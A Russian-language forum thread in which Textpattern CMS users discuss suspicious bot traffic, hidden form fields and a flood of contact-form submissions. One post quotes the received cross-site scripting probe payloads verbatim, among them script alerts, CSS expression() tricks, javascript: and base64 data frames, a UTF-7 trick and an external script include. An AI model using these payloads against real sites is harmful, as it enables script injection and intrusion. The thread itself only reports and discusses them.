форум общения русскоязычных пользователей CMS Текстпаттерн
Вы не зашли.
Нашел в логах такую вот запись:
2007/04/16/pervaya-mukha?parentid=41&backpage=/2007/04/16/pervaya-mukha
Эти же parentid и backpage значатся в hidden-полях. Может это дырка старая в TxP?
Неактивен
Дык ip забанил, но это точно какой-то бот, он взял и весь мой блог за раз прошелся, а некоторые странички вот так вот запрашивал еще. Странно все это.
Неактивен
Dead Krolik написал:
Дык ip забанил, но это точно какой-то бот, он взял и весь мой блог за раз прошелся
а по IP не видно - что это за бот?
может, поисковик какой-то новый пополняет свою базу и решил начать с твоего сайта?
Неактивен
Я не думаю, что поисковики таким страдают. Тем более, что я страрась чутко блокировать в robots.txt все поисковики, кроме яндекса и гугла.
IP - 155.264.135.54, но вот кто там за ним скрывается узнать щас не удалось, все хуиз сервисы на данный момент лежат или тупят.
Неактивен
155.264.135.54 (Resolved: generichost.gordon.army.mil )
Похоже - U.S. Army готовится выступить широким фронтом против тех, кто балуется крольчатиной.
И ведет массированную интернет разведку :-)
Неактивен
Ааааааа. Что делать ?!???!!!
Срочно прошу политического убежища в Албании или Зимбабве, там не действуют законы США
Неактивен
Никак не могу найти, посредством чего мне можно убрать эти две строчки из кода моих страниц:
<input type="hidden" name="parentid" value="1763" /> <input type="hidden" name="backpage" value="/doors/1763/" />
В Мозилле вместо этих строчек на каждой странице отображаются две полоски: || ...как прям шестерка какая-то...
Отредактированно Tris (03-09-2008 02:19:41)
Неактивен
В оформление - страницы. также может быть в формах
ничего "своего" тхп в код не добавляет
Неактивен
Через форму обратной связи (zem_contact_reborn) пришло более сотни сообщений с таким содержанием полей:
<script>alert(41760,1129797801)</script> >alert(41787,1129828472);</ScRiPt>domain.com </textarea><ScRiPt <DIV STYLE="width:expression(alert(41832,1130965972));"> <FRAMESET><FRAME SRC="JaVaS&#99;RiPt:alert(41833,1130965972);"></FRAMESET> <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=" <ScRiPt src=http://testphp.acunetix.com/xss.js?41839,1130969676></ScRiPt> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;charset=UTF-7"></HEAD>+ADw-ScRiPt+AD4-alert </xss/*-*/style=xss:e/**/xpression(alert(42003,2527602315))> ну и другие вариации
Также было куча запросов через форму комментариев, но самих комментариев нет.
Ломают?
Неактивен
Не обращать внимания - просто спамеры-хакеры вставляют свою хрень куда только можно.
Неактивен
Нет уж!
Уже вычислил кто, будем письмо писать, типа мы все видим, обо всем знаем
Неактивен